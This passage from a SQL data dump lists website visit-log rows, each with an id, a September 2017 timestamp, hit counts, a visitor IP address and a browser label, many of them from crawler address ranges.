her'),(158284,1505886932,1,1,0,0,'207.46.13.18','other'),(158285,1505887141,1,1,0,0,'91.196.178.70','firefox'),(158286,1505887309,1,1,0,0,'217.182.132.30','other'),(158287,1505887353,1,1,0,0,'217.182.132.96','other'),(158288,1505887515,1,1,0,0,'217.182.132.21','other'),(158289,1505887738,1,1,0,0,'51.255.65.59','other'),(158290,1505887844,1,1,0,0,'188.166.68.19','chrome'),(158291,1505888191,2,2,0,0,'216.244.66.237','other'),(158292,1505888653,1,1,0,0,'46.48.13.161','chrome'),(158293,1505888691,1,1,0,0,'217.182.132.183','other'),(158294,1505889136,1,1,0,0,'5.45.207.64','other'),(158295,1505889694,1,1,0,0,'51.255.65.20','other'),(158296,1505889712,1,1,0,0,'164.132.162.156','other'),(158297,1505889750,1,1,0,0,'188.255.50.81','msie'),(158298,1505889859,1,1,0,0,'8.29.198.27','other'),(158299,1505889909,1,1,0,0,'51.255.65.91','other'),(158300,1505890115,1,0,1,0,'66.249.66.195',''),(158301,1505890118,1,1,0,0,'185.137.18.75','chrome'),(158302,1505890296,1,1,0,0,'5.166.156.44','msie'),(158303,1505890433,1,1,0,0,'51.255.65.55','other'),(158304,1505890674,1,1,0,0,'91.196.178.69','chrome'),(158305,1505890892,1,1,0,0,'5.45.207.64','other'),(158306,1505891144,1,1,0,0,'137.74.207.170','other'),(158307,1505891233,1,1,0,0,'217.182.132.178','other'),(158308,1505891560,1,1,0,0,'216.244.66.237','other'),(158309,1505891604,1,1,0,0,'109.63.149.202','msie'),(158310,1505891700,1,1,0,0,'5.228.35.80','msie'),(158311,1505892065,1,1,0,0,'5.45.207.64','other'),(158312,1505892371,1,1,0,0,'217.69.133.9','other'),(158313,1505892683,1,1,0,0,'51.255.65.43','other'),(158314,1505893002,1,1,0,0,'51.255.65.58','other'),(158315,1505893277,1,1,0,0,'51.255.65.81','other'),(158316,1505893353,1,1,0,0,'51.255.65.50','other'),(158317,1505893574,2,2,0,0,'91.209.11.236','other'),(158318,1505893647,1,1,0,0,'51.255.65.56','other'),(158319,1505894388,85,85,0,0,'93.104.209.37','other'),(158320,1505894512,1,1,0,0,'51.255.65.73','other'),(158321,1505894523,2,2,0,0,'5.45.207.9','other'),(158322,1505894563,1,1,0,0,'91.196.177.15','chrome'),(158323,1505894626,1,1,0,0,'217.182.132.81','other'),(158324,1505894895,1,1,0,0,'107.167.104.175','opera'),(158325,1505895030,1,1,0,0,'91.196.177.46','chrome'),(158326,1505895300,30,30,0,0,'93.104.209.37','other'),(158327,1505895371,1,1,0,0,'91.209.11.236','other'),(158328,1505895713,1,1,0,0,'95.108.213.20','other'),(158329,1505895771,1,1,0,0,'217.182.132.69','other'),(158330,1505895804,1,1,0,0,'178.154.171.75','other'),(158331,1505895967,1,1,0,0,'164.132.162.187','other'),(158332,1505897906,1,1,0,0,'162.210.196.130','other'),(158333,1505897961,1,1,0,0,'5.45.207.9','other'),(158334,1505898094,1,1,0,0,'51.255.65.21','other'),(158335,1505898241,1,1,0,0,'51.255.71.98','other'),(158336,1505899636,1,1,0,0,'5.45.207.64','other'),(158337,1505899846,1,1,0,0,'217.182.132.156','other'),(158338,1505900193,1,1,0,0,'51.255.65.23','other'),(158339,1505900425,1,1,0,0,'93.74.212.147','firefox'),(158340,1505900527,1,1,0,0,'192.162.135.169','opera'),(158341,1505900537,1,1,0,0,'159.224.255.154','opera'),(158342,1505900687,1,1,0,0,'8.29.198.26','other'),(158343,1505900804,1,1,0,0,'217.182.132.16','other'),(158344,1505900858,1,1,0,0,'137.74.201.108','other'),(158345,1505900901,1,1,0,0,'81.1.242.33','other'),(158346,1505902579,1,1,0,0,'66.102.9.27','chrome'),(158347,1505902599,1,1,0,0,'51.255.65.22','other'),(158348,1505902650,1,1,0,0,'107.167.106.199','opera'),(158349,1505902665,1,1,0,0,'37.54.22.131','firefox'),(158350,1505902781,1,1,0,0,'164.132.162.164','other'),(158351,1505903602,1,1,0,0,'217.182.132.182','other'),(158352,1505903697,1,1,0,0,'51.255.65.33','other'),(158353,1505903995,1,1,0,0,'216.244.66.237','other'),(158354,1505904505,1,1,0,0,'5.45.207.64','other'),(158355,1505904713,1,1,0,0,'37.73.254.64','chrome'),(158356,1505904945,1,1,0,0,'217.182.132.16','other'),(158357,1505904958,1,1,0,0,'46.48.13.161','chrome'),(158358,1505905453,2,2,0,0,'91.209.11.236','other'),(158359,1505905716,1,1,0,0,'93.74.212.147','firefox'),(158360,1505905845,1,1,0,0,'217.182.132.171','other'),(158361,1505906792,1,1,0,0,'5.45.207.64','other'),(158362,1505906819,1,1,0,0,'91.196.178.130','firefox'),(158363,1505907059,1,1,0,0,'91.196.178.70','firefox'),(158364,1505907747,1,0,1,0,'66.249.66.195',''),(158365,1505907773,1,1,0,0,'5.45.207.64','other'),(158366,1505907777,1,1,0,0,'5.45.207.9','other'),(158367,1505907864,1,1,0,0,'107.167.107.195','opera'),(158368,1505908069,1,1,0,0,'51.255.65.20','other'),(158369,1505908338,1,1,0,0,'94.179.46.25','chrome'),(158370,1505908555,1,1,0,0,'95.158.3.62','chrome'),(158371,1505908706,1,1,0,0,'217.182.132.178','other'),(158372,1505909024,1,1,0,0,'91.196.178.71','firefox'),(158373,1505909731,1,1,0,0,'137.74.207.161','other'),(158374,1505910105,1,1,0,0,'216.244.66.237','other'),(158375,1505910484,1,1,0,0,'51.255.65.82','other'),(158376,1505910485,1,1,0,0,'77.222.155.89','chrome'),(158377,1505911140,1,1,0,0,'95.108.213.11','other'),(158378,1505911479,1,1,0,0,'217.182.132.182','other'),(158379,1505911514,1,1,0,0,'8.29.198.27','other'),(158380,1505911580,2,2,0,0,'54.165.59.7','other'),(158381,1505911821,1,1,0,0,'51.255.71.127','other'),(158382,1505911979,1,1,0,0,'217.182.132.150','other'),(158383,1505913030,1,1,0,0,'51.255.71.110','other'),(158384,1505913116,1,1,0,0,'178.93.245.40','chrome'),(158385,1505913870,1,1,0,0,'217.182.132.148','other'),(158386,1505914430,1,1,0,0,'91.209.11.236','other'),(158387,1505914545,1,1,0,0,'217.182.132.187','other'),(158388,1505914807,1,1,0,0,'217.182.132.31','other'),(158389,1505914839,1,1,0,0,'217.182.132.29','other'),(158390,1505914847,1,1,0,0,'51.255.65.12','other'),(158391,1505914981,1,1,0,0,'5.45.207.64','other'),(158392,1505915089,1,1,0,0,'91.196.178.69','firefox'),(158393,1505915365,1,1,0,0,'91.196.178.68','chrome'),(158394,1505915512,1,0,1,0,'66.249.66.201',''),(158395,1505915792,2,2,0,0,'91.209.11.236','other'),(158396,1505915798,1,1,0,0,'217.182.132.29','other'),(158397,1505915999,1,1,0,0,'95.108.213.20','other'),(158398,1505916002,1,1,0,0,'5.45.207.9','other'),(158399,1505916003,1,1,0,0,'37.9.113.87','other'),(158400,1505916006,1,1,0,0,'91.196.178.66','chrome'),(158401,1505916294,1,1,0,0,'178.154.171.75','other'),(158402,1505916423,1,1,0,0,'137.74.207.114','other'),(158403,1505916615,1,1,0,0,'217.182.132.81','other'),(158404,1505917045,1,1,0,0,'95.67.126.42','other'),(158405,1505917144,1,1,0,0,'91.196.178.69','firefox'),(158406,1505917621,1,1,0,0,'37.9.113.87','other'),(158407,1505918074,1,1,0,0,'185.137.18.227','chrome'),(158408,1505918302,1,1,0,0,'217.182.132.183','other'),(158409,1505918815,1,1,0,0,'107.167.106.229','opera'),(158410,1505918890,2,2,0,0,'5.45.207.64','other'),(158411,1505918949,1,1,0,0,'217.182.132.18','other'),(158412,1505919144,1,1,0,0,'51.255.65.40','other'),(158413,1505919381,1,1,0,0,'51.255.65.37','other'),(158414,1505919428,1,1,0,0,'95.213.218.99','other'),(158415,1505919491,1,1,0,0,'51.255.71.110','other'),(158416,1505920347,1,1,0,0,'149.56.89.166','firefox'),(158417,1505921020,1,1,0,0,'180.76.15.135','other'),(158418,1505921119,1,0,1,0,'66.249.66.76',''),(158419,1505921121,1,1,0,0,'66.249.66.74','chrome'),(158420,1505922152,1,1,0,0,'37.9.113.87','other'),(158421,1505922347,1,1,0,0,'8.29.198.26','other'),(158422,1505922379,3,3,0,0,'216.244.66.237','other'),(158423,1505922477,1,1,0,0,'217.182.132.67','other'),(158424,1505922482,1,1,0,0,'51.255.65.19','other'),(158425,1505922612,1,1,0,0,'91.209.11.236','other'),(158426,1505923006,1,1,0,0,'217.182.132.170','other'),(158427,1505923606,1,1,0,0,'51.255.65.3','other'),(158428,1505923721,1,1,0,0,'51.255.65.19','other'),(158429,1505923890,1,1,0,0,'40.77.167.47','other'),(158430,1505923964,1,1,0,0,'51.255.65.84','other'),(158431,1505924766,1,1,0,0,'46.48.13.161','chrome'),(158432,1505926283,1,1,0,0,'37.9.113.87','other'),(158433,1505926387,1,1,0,0,'5.45.207.9','other'),(158434,1505926575,1,1,0,0,'217.182.132.151','other'),(158435,1505926962,1,1,0,0,'141.8.183.15','other'),(158436,1505927381,1,1,0,0,'137.74.207.159','other'),(158437,1505927965,1,1,0,0,'95.108.213.11','other'),(158438,1505928271,1,1,0,0,'51.255.65.40','other'),(158439,1505928666,1,1,0,0,'51.255.65.44','other'),(158440,1505928841,1,1,0,0,'217.182.132.18','other'),(158441,1505929213,1,0,1,0,'66.249.66.199',''),(158442,1505929981,1,1,0,0,'217.182.132.149','other'),(158443,1505930523,1,1,0,0,'81.1.242.33','other'),(158444,1505930733,1,1,0,0,'91.79.8.68','chrome'),(158445,1505930941,1,1,0,0,'216.244.66.237','other'),(158446,1505931345,1,1,0,0,'51.255.65.46','other'),(158447,1505931579,1,1,0,0,'217.182.132.57','other'),(158448,1505931620,1,1,0,0,'37.115.75.112','chrome'),(158449,1505931630,1,1,0,0,'207.46.13.163','other'),(158450,1505931667,22,22,0,0,'154.16.138.15','other'),(158451,1505931688,1,1,0,0,'5.45.207.64','other'),(158452,1505931698,1,1,0,0,'51.255.71.113','other'),(158453,1505932070,1,1,0,0,'5.45.207.9','other'),(158454,1505932578,1,1,0,0,'178.92.8.70','chrome'),(158455,1505932767,1,1,0,0,'95.135.90.217','chrome'),(158456,1505933117,1,1,0,0,'93.78.123.73','chrome'),(158457,1505933174,1,1,0,0,'8.29.198.25','other'),(158458,1505933625,1,1,0,0,'217.182.132.96','other'),(158459,1505933694,1,1,0,0,'51.255.65.41','other'),(158460,1505933980,1,1,0,0,'216.244.66.237','other'),(158461,1505934207,1,1,0,0,'66.249.66.76','chrome'),(158462,1505934267,1,1,0,0,'5.45.207.9','other'),(158463,1505935455,2,2,0,0,'5.45.207.64','other'),(158464,1505936368,1,1,0,0,'51.255.71.98','other'),(158465,1505936501,3,3,0,0,'46.229.168.75','other'),(158466,1505936520,5,5,0,0,'46.229.168.70','other'),(158467,1505936538,5,5,0,0,'46.229.168.67','other'),(158468,1505936563,6,6,0,0,'46.229.168.66','other'),(158469,1505936575,4,4,0,0,'46.229.168.79','other'),(158470,1505936593,6,6,0,0,'46.229.168.71','other'),(158471,1505936618,3,3,0,0,'46.229.168.65','other'),(158472,1505936691,3,3,0,0,'46.229.168.80','other'),(158473,1505936759,5,5,0,0,'46.229.168.76','other'),(158474,1505936881,6,6,0,0,'46.229.168.77','other'),(158475,1505936918,2,2,0,0,'46.229.168.78','other'),(158476,1505936948,4,4,0,0,'46.229.168.73','other'),(158477,1505937063,3,3,0,0,'46.229.168.74','other'),(158478,1505937125,4,4,0,0,'46.229.168.72','other'),(158479,1505937450,4,4,0,0,'46.229.168.68','other'),(158480,1505937464,1,1,0,0,'216.244.66.237','other'),(158481,1505937468,5,5,0,0,'46.229.168.69','other'),(158482,1505937478,1,1,0,0,'5.45.207.9','other'),(158483,1505937486,2,2,0,0,'46.229.168.75','other'),(158484,1505937506,4,4,0,0,'46.229.168.71','other'),(158485,1505937528,2,2,0,0,'46.229.168.66','other'),(158486,1505937620,1,1,0,0,'217.182.132.151','other'),(158487,1505937629,4,4,0,0,'46.229.168.80','other'),(158488,1505937697,1,1,0,0,'217.182.132.56','other'),(158489,1505937727,1,1,0,0,'217.182.132.79','other'),(158490,1505937734,4,4,0,0,'46.229.168.65','other'),(158491,1505937736,1,1,0,0,'157.55.39.167','other'),(158492,1505937783,3,3,0,0,'46.229.168.79','other'),(158493,1505937820,7,7,0,0,'46.229.168.76','other'),(158494,1505937885,1,1,0,0,'37.9.113.119','other'),(158495,1505937888,2,2,0,0,'46.229.168.78','other'),(158496,1505937930,3,3,0,0,'46.229.168.73','other'),(158497,1505938058,6,6,0,0,'46.229.168.74','other'),(158498,1505938101,2,2,0,0,'5.189.133.114','other'),(158499,1505938114,7,7,0,0,'46.229.168.72','other'),(158500,1505938250,4,4,0,0,'46.229.168.67','other'),(158501,1505938372,3,3,0,0,'46.229.168.77','other'),(158502,1505938383,4,4,0,0,'46.229.168.68','other'),(158503,1505938391,1,1,0,0,'217.182.132.87','other'),(158504,1505938415,1,1,0,0,'51.255.65.68','other'),(158505,1505938419,7,7,0,0,'46.229.168.69','other'),(158506,1505938501,7,7,0,0,'46.229.168.71','other'),(158507,1505938514,6,6,0,0,'46.229.168.70','other'),(158508,1505938656,1,1,0,0,'40.77.167.47','other'),(158509,1505938739,2,2,0,0,'46.229.168.80','other'),(158510,1505938863,3,3,0,0,'46.229.168.78','other'),(158511,1505938875,3,3,0,0,'46.229.168.66','other'),(158512,1505938898,8,8,0,0,'46.229.168.79','other'),(158513,1505938904,4,4,0,0,'46.229.168.76','other'),(158514,1505938990,6,6,0,0,'46.229.168.75','other'),(158515,1505939256,3,3,0,0,'46.229.168.74','other'),(158516,1505939287,2,2,0,0,'46.229.168.68','other'),(158517,1505939345,4,4,0,0,'46.229.168.72','other'),(158518,1505939394,1,1,0,0,'46.229.168.65','other'),(158519,1505939403,7,7,0,0,'46.229.168.67','other'),(158520,1505939421,1,1,0,0,'46.229.168.70','other'),(158521,1505939473,1,1,0,0,'46.229.168.77','other'),(158522,1505939551,1,1,0,0,'46.229.168.71','other'),(158523,1505939667,1,1,0,0,'217.182.132.67','other'),(158524,1505939671,1,1,0,0,'51.255.71.127','other'),(158525,1505939768,1,1,0,0,'46.229.168.78','other'),(158526,1505939815,1,1,0,0,'46.229.168.79','other'),(158527,1505939825,1,1,0,0,'217.182.132.33','other'),(158528,1505939830,2,2,0,0,'5.45.207.9','other'),(158529,1505939888,1,1,0,0,'46.229.168.73','other'),(158530,1505939908,1,1,0,0,'40.77.167.47','other'),(158531,1505939909,1,1,0,0,'46.229.168.69','other'),(158532,1505939949,1,1,0,0,'216.244.66.237','other'),(158533,1505940250,1,1,0,0,'37.9.113.87','other'),(158534,1505940364,1,1,0,0,'178.154.171.75','other'),(158535,1505941258,1,1,0,0,'157.55.39.167','other'),(158536,1505941528,1,1,0,0,'209.90.225.210','chrome'),(158537,1505942066,1,1,0,0,'51.255.71.126','other'),(158538,1505942151,1,1,0,0,'217.69.133.6','other'),(158539,1505942779,1,1,0,0,'207.46.13.101','other'),(158540,1505942786,1,0,1,0,'66.249.66.75',''),(158541,1505942832,1,0,1,0,'66.249.66.74',''),(158542,1505942836,1,1,0,0,'91.209.11.236','other'),(158543,1505943696,1,1,0,0,'216.244.66.237','other'),(158544,1505943929,1,1,0,0,'5.45.207.9','other'),(158545,1505943933,1,1,0,0,'217.182.132.178','other'),(158546,1505944004,1,1,0,0,'8.29.198.26','other'),(158547,1505944051,1,1,0,0,'217.182.132.62','other'),(158548,1505945850,1,1,0,0,'37.9.113.75','other'),(158549,1505945972,1,1,0,0,'137.74.201.100','other'),(158550,1505946000,1,1,0,0,'180.76.15.23','other'),(158551,1505946112,1,1,0,0,'217.182.132.97','other'),(158552,1505946269,1,1,0,0,'217.182.132.58','other'),(158553,1505946291,1,1,0,0,'40.77.167.47','other'),(158554,1505946499,1,1,0,0,'51.255.65.36','other'),(158555,1505946623,1,1,0,0,'51.255.65.90','other'),(158556,1505946712,1,0,1,0,'66.249.66.199',''),(158557,1505946974,1,1,0,0,'217.182.132.30','other'),(158558,1505947307,1,1,0,0,'51.255.65.69','other'),(158559,1505947633,1,1,0,0,'91.209.11.236','other'),(158560,1505947854,1,1,0,0,'5.45.207.64','other'),(158561,1505948694,1,1,0,0,'141.8.183.5','other'),(158562,1505949076,1,1,0,0,'51.255.65.84','other'),(158563,1505949168,1,1,0,0,'51.255.71.127','other'),(158564,1505949718,1,1,0,0,'137.74.207.116','other'),(158565,1505950076,1,1,0,0,'51.255.65.45','other'),(158566,1505950397,1,1,0,0,'217.182.132.86','other'),(158567,1505950530,1,0,1,0,'66.249.66.195',''),(158568,1505951047,1,1,0,0,'51.255.65.48','other'),(158569,1505951871,1,1,0,0,'51.255.65.84','other'),(158570,1505952058,1,1,0,0,'51.255.65.46','other'),(158571,1505952557,1,1,0,0,'5.45.207.9','other'),(158572,1505952580,2,2,0,0,'91.209.11.236','other'),(158573,1505952687,1,1,0,0,'137.74.207.170','other'),(158574,1505954830,1,1,0,0,'8.29.198.26','other'),(158575,1505955269,1,1,0,0,'216.244.66.237','other'),(158576,1505955591,1,1,0,0,'217.182.132.241','other'),(158577,1505955737,1,1,0,0,'91.209.11.236','other'),(158578,1505955934,1,1,0,0,'51.255.65.29','other'),(158579,1505956335,1,1,0,0,'137.74.207.188','other'),(158580,1505957007,1,1,0,0,'137.74.203.194','other'),(158581,1505957514,1,1,0,0,'217.182.132.93','other'),(158582,1505957544,1,1,0,0,'81.1.242.33','other'),(158583,1505958578,1,1,0,0,'216.244.66.237','other'),(158584,1505958640,1,1,0,0,'217.182.132.59','other'),(158585,1505958665,1,1,0,0,'217.69.133.9','other'),(158586,1505960507,1,1,0,0,'51.255.65.32','other'),(158587,1505960658,1,1,0,0,'217.182.132.50','other'),(158588,1505960713,1,1,0,0,'51.255.65.42','other'),(158589,1505961514,2,2,0,0,'91.209.11.236','other'),(158590,1505961575,1,1,0,0,'217.182.132.54','other'),(158591,1505962032,1,1,0,0,'66.249.66.199','chrome'),(158592,1505962187,1,1,0,0,'217.182.132.153','other'),(158593,1505963045,1,1,0,0,'51.255.71.133','other'),(158594,1505963242,1,0,1,0,'68.180.228.221',''),(158595,1505963438,1,1,0,0,'5.45.207.64','other'),(158596,1505963771,1,1,0,0,'137.74.207.101','other'),(158597,1505964049,1,1,0,0,'51.255.71.98','other'),(158598,1505964152,1,1,0,0,'217.182.132.62','other'),(158599,1505964222,1,1,0,0,'217.182.132.76','other'),(158600,1505965094,1,1,0,0,'37.9.113.87','other'),(158601,1505965373,1,1,0,0,'157.55.39.167','other'),(158602,1505965510,1,1,0,0,'51.255.65.72','other'),(158603,1505965660,1,1,0,0,'8.29.198.26','other'),(158604,1505965829,1,1,0,0,'51.255.65.14','other'),(158605,1505965993,1,1,0,0,'207.46.13.112','other'),(158606,1505966324,1,1,0,0,'217.182.132.37','other'),(158607,1505966433,1,1,0,0,'5.45.207.64','other'),(158608,1505966752,1,1,0,0,'91.196.178.33','firefox'),(158609,1505967692,2,2,0,0,'216.244.66.237','other'),(158610,1505967890,1,1,0,0,'5.45.207.64','other'),(158611,1505968039,1,0,1,0,'66.249.66.199',''),(158612,1505968371,2,2,0,0,'137.74.201.100','other'),(158613,1505968880,1,1,0,0,'91.209.11.236','other'),(158614,1505969162,1,1,0,0,'137.74.207.119','other'),(158615,1505969484,1,1,0,0,'51.255.65.2','other'),(158616,1505969503,1,1,0,0,'51.255.71.129','other'),(158617,1505969622,1,1,0,0,'107.167.107.174','opera'),(158618,1505969863,1,1,0,0,'5.45.207.9','other'),(158619,1505969909,1,1,0,0,'217.182.132.184','other'),(158620,1505970213,1,1,0,0,'141.8.183.38','other'),(158621,1505970694,1,1,0,0,'217.182.132.152','other'),(158622,1505970796,1,1,0,0,'216.244.66.237','other'),(158623,1505970826,1,1,0,0,'91.209.11.236','other'),(158624,1505971739,1,1,0,0,'217.182.132.18','other'),(158625,1505973117,1,1,0,0,'81.1.242.33','other'),(158626,1505973242,1,1,0,0,'157.55.39.167','other'),(158627,1505973324,1,1,0,0,'217.182.132.77','other'),(158628,1505973645,1,1,0,0,'5.45.207.9','other'),(158629,1505973987,1,1,0,0,'216.244.66.237','other'),(158630,1505974906,1,1,0,0,'91.209.11.236','other'),(158631,1505974947,1,1,0,0,'217.182.132.192','other'),(158632,1505975289,1,1,0,0,'109.108.247.73','chrome'),(158633,1505975396,1,1,0,0,'217.182.132.18','other'),(158634,1505975502,1,1,0,0,'51.255.65.16','other'),(158635,1505975669,1,1,0,0,'51.255.65.21','other'),(158636,1505975860,1,1,0,0,'91.196.177.46','chrome'),(158637,1505975875,1,1,0,0,'51.255.65.71','other'),(158638,1505976495,1,1,0,0,'8.29.198.25','other'),(158639,1505976675,1,1,0,0,'5.45.207.64','other'),(158640,1505976906,1,1,0,0,'51.255.65.32','other'),(158641,1505977086,1,1,0,0,'164.132.162.164','other'),(158642,1505977364,2,2,0,0,'37.52.23.54','chrome'),(158643,1505977738,1,1,0,0,'217.182.132.65','other'),(158644,1505977976,1,1,0,0,'188.163.16.6','chrome'),(158645,1505978467,1,1,0,0,'51.255.65.79','other'),(158646,1505978726,1,1,0,0,'51.255.65.17','other'),(158647,1505979559,1,1,0,0,'95.132.27.210','firefox'),(158648,1505979653,2,2,0,0,'216.244.66.237','other'),(158649,1505980093,1,0,1,0,'68.180.228.221',''),(158650,1505980290,1,1,0,0,'217.182.132.20','other'),(158651,1505980325,1,1,0,0,'213.180.203.25','other'),(158652,1505980399,1,1,0,0,'217.182.132.28','other'),(158653,1505980441,2,2,0,0,'91.196.178.68','chrome'),(158654,1505980565,1,1,0,0,'217.182.132.81','other'),(158655,1505980775,2,2,0,0,'37.52.120.220','chrome'),(158656,1505980932,1,1,0,0,'51.255.65.46','other'),(158657,1505981205,1,1,0,0,'51.255.65.62','other'),(158658,1505981333,1,1,0,0,'217.182.132.90','other'),(158659,1505981454,1,1,0,0,'5.45.207.64','other'),(158660,1505981472,1,1,0,0,'217.182.132.52','other'),(158661,1505981474,1,1,0,0,'5.45.207.9','other'),(158662,1505981532,1,1,0,0,'217.182.132.54','other'),(158663,1505981686,1,1,0,0,'66.249.66.74','chrome'),(158664,1505981761,1,1,0,0,'217.182.132.191','other'),(158665,1505981802,1,1,0,0,'91.196.178.68','chrome'),(158666,1505981883,1,1,0,0,'217.182.132.92','other'),(158667,1505981972,1,1,0,0,'107.167.107.174','opera'),(158668,1505982139,1,1,0,0,'217.69.133.3','other'),(158669,1505982235,1,1,0,0,'180.76.15.153','other'),(158670,1505982259,1,1,0,0,'91.209.11.236','other'),(158671,1505982336,1,1,0,0,'51.255.65.22','other'),(158672,1505982451,1,1,0,0,'217.182.132.79','other'),(158673,1505982491,1,1,0,0,'51.255.65.68','other'),(158674,1505982501,1,1,0,0,'51.255.71.110','other'),(158675,1505982542,1,1,0,0,'137.74.207.164','other'),(158676,1505982553,1,1,0,0,'5.45.207.64','other'),(158677,1505982663,1,1,0,0,'164.132.162.188','other'),(158678,1505982672,1,1,0,0,'137.74.207.159','other'),(158679,1505982710,1,1,0,0,'217.182.132.88','other'),(158680,1505982788,1,1,0,0,'217.182.132.35','other'),(158681,1505982805,1,1,0,0,'217.182.132.20','other'),(158682,1505982903,1,1,0,0,'79.160.153.206','chrome'),(158683,1505983111,1,1,0,0,'91.196.178.69','chrome'),(158684,1505983199,1,1,0,0,'51.255.71.125','other'),(158685,1505983365,1,1,0,0,'51.255.65.23','other'),(158686,1505983828,1,1,0,0,'51.255.71.123','other'),(158687,1505984001,1,1,0,0,'95.220.199.6','msie'),(158688,1505984002,1,1,0,0,'109.63.205.52','msie'),(158689,1505984009,1,1,0,0,'107.167.107.174','opera'),(158690,1505984175,1,1,0,0,'137.74.203.194','other'),(158691,1505984352,1,1,0,0,'217.182.132.193','other'),(158692,1505984371,1,1,0,0,'217.182.132.53','other'),(158693,1505984478,1,1,0,0,'217.182.132.146','other'),(158694,1505984780,1,1,0,0,'51.255.65.57','other'),(158695,1505984788,1,1,0,0,'81.1.242.33','other'),(158696,1505985011,1,1,0,0,'87.250.224.46','other'),(158697,1505985103,1,1,0,0,'51.255.65.52','other'),(158698,1505985141,1,1,0,0,'217.182.132.90','other'),(158699,1505985247,1,1,0,0,'37.52.204.205','chrome'),(158700,1505985477,1,1,0,0,'51.255.71.116','other'),(158701,1505985486,1,1,0,0,'51.255.65.68','other'),(158702,1505985703,1,1,0,0,'217.182.132.74','other'),(158703,1505985764,1,1,0,0,'51.255.65.25','other'),(158704,1505985822,1,1,0,0,'51.255.65.26','other'),(158705,1505985899,1,1,0,0,'141.8.142.53','other'),(158706,1505985906,1,1,0,0,'217.182.132.182','other'),(158707,1505986010,1,1,0,0,'51.255.71.114','other'),(158708,1505986043,1,1,0,0,'51.255.65.88','other'),(158709,1505986061,1,0,1,0,'66.249.66.195',''),(158710,1505986210,1,1,0,0,'5.45.207.64','other'),(158711,1505986349,1,1,0,0,'217.182.132.24','other'),(158712,1505986442,1,0,1,0,'66.249.66.201',''),(158713,1505986956,1,1,0,0,'91.196.177.46','chrome'),(158714,1505987013,1,1,0,0,'137.74.207.188','other'),(158715,1505987026,1,1,0,0,'217.182.132.66','other'),(158716,1505987098,1,1,0,0,'164.132.162.154','other'),(158717,1505987131,2,2,0,0,'5.45.207.64','other'),(158718,1505987195,1,1,0,0,'91.209.11.236','other'),(158719,1505987245,1,1,0,0,'217.182.132.36','other'),(158720,1505987279,1,1,0,0,'217.182.132.179','other'),(158721,1505987327,1,1,0,0,'8.29.198.25','other'),(158722,1505987775,1,1,0,0,'51.255.65.13','other'),(158723,1505987779,1,1,0,0,'107.167.107.174','opera'),(158724,1505987868,1,1,0,0,'51.255.71.111','other'),(158725,1505988099,1,1,0,0,'51.255.65.45','other'),(158726,1505988118,1,1,0,0,'51.255.71.98','other'),(158727,1505988133,1,1,0,0,'51.255.71.132','other'),(158728,1505988147,1,1,0,0,'91.196.177.46','chrome'),(158729,1505988491,1,1,0,0,'217.69.133.203','other'),(158730,1505988519,1,1,0,0,'178.92.249.18','chrome'),(158731,1505988978,1,1,0,0,'51.255.65.56','other'),(158732,1505989088,1,1,0,0,'51.255.65.49','other'),(158733,1505989470,1,1,0,0,'51.255.65.72','other'),(158734,1505989723,1,1,0,0,'91.196.177.46','chrome'),(158735,1505989918,1,1,0,0,'217.182.132.178','other'),(158736,1505989990,1,1,0,0,'91.209.11.236','other'),(158737,1505990044,1,1,0,0,'91.196.178.70','firefox'),(158738,1505990301,1,1,0,0,'178.154.171.75','other'),(158739,1505990401,1,1,0,0,'137.74.207.161','other'),(158740,1505990660,1,1,0,0,'217.182.132.51','other'),(158741,1505990764,1,1,0,0,'217.182.132.81','other'),(158742,1505990802,1,1,0,0,'217.182.132.31','other'),(158743,1505990833,1,1,0,0,'107.167.107.174','opera'),(158744,1505991041,1,1,0,0,'217.182.132.92','other'),(158745,1505991061,1,1,0,0,'216.244.66.237','other'),(158746,1505991432,1,1,0,0,'217.182.132.187','other'),(158747,1505991721,1,1,0,0,'51.255.71.125','other'),(158748,1505991842,1,1,0,0,'217.182.132.62','other'),(158749,1505991944,1,1,0,0,'217.182.132.153','other'),(158750,1505991983,1,1,0,0,'91.209.11.236','other'),(158751,1505992089,1,1,0,0,'217.182.132.91','other'),(158752,1505992423,1,1,0,0,'164.132.162.158','other'),(158753,1505992822,1,0,1,0,'68.180.228.164',''),(158754,1505992969,1,1,0,0,'51.255.65.45','other'),(158755,1505993269,1,1,0,0,'217.182.132.84','other'),(158756,1505993299,1,1,0,0,'217.182.132.92','other'),(158757,1505993806,2,2,0,0,'91.209.11.236','other'),(158758,1505993977,1,1,0,0,'217.182.132.170','other'),(158759,1505994169,1,1,0,0,'137.74.207.119','other'),(158760,1505994264,1,1,0,0,'217.182.132.18','other'),(158761,1505994407,1,1,0,0,'217.182.132.29','other'),(158762,1505994431,1,1,0,0,'217.182.132.77','other'),(158763,1505994972,7,7,0,0,'213.108.45.138','chrome'),(158764,1505995464,2,2,0,0,'91.209.11.236','other'),(158765,1505995940,1,1,0,0,'37.9.113.87','other'),(158766,1505996070,1,1,0,0,'217.182.132.172','other'),(158767,1505996095,1,0,1,0,'66.249.66.74',''),(158768,1505996785,1,1,0,0,'51.255.65.56','other'),(158769,1505997129,1,1,0,0,'66.102.9.27','chrome'),(158770,1505997162,1,1,0,0,'164.132.162.157','other'),(158771,1505997225,3,3,0,0,'5.45.207.64','other'),(158772,1505997340,1,1,0,0,'51.255.65.55','other'),(158773,1505998157,1,1,0,0,'8.29.198.25','other'),(158774,1505998212,1,1,0,0,'5.45.207.64','other'),(158775,1505998444,1,1,0,0,'91.196.178.70','firefox'),(158776,1505998597,1,1,0,0,'51.255.65.24','other'),(158777,1505998730,1,1,0,0,'217.182.132.178','other'),(158778,1505998943,1,1,0,0,'137.74.207.159','other'),(158779,1505999195,1,1,0,0,'217.182.132.76','other'),(158780,1505999659,1,1,0,0,'37.73.205.190','chrome'),(158781,1505999923,1,1,0,0,'216.244.66.237','other'),(158782,1506000254,1,0,1,0,'66.249.66.74',''),(158783,1506001250,1,1,0,0,'207.46.13.163','other'),(158784,1506001329,1,1,0,0,'162.210.196.100','other'),(158785,1506001509,1,1,0,0,'217.182.132.153','other'),(158786,1506002323,1,1,0,0,'217.182.132.20','other'),(158787,1506002491,1,1,0,0,'217.182.132.18','other'),(158788,1506002614,1,1,0,0,'91.209.11.236','other'),(158789,1506002873,1,1,0,0,'51.255.71.119','other'),(158790,1506002990,1,1,0,0,'51.255.65.71','other'),(158791,1506003131,1,1,0,0,'51.255.65.88','other'),(158792,1506003389,1,1,0,0,'91.196.178.70','firefox'),(158793,1506003528,1,1,0,0,'95.67.79.185','chrome'),(158794,1506003771,1,1,0,0,'51.255.71.113','other'),(158795,1506004136,1,1,0,0,'164.132.162.156','other'),(158796,1506004243,1,1,0,0,'217.182.132.18','other'),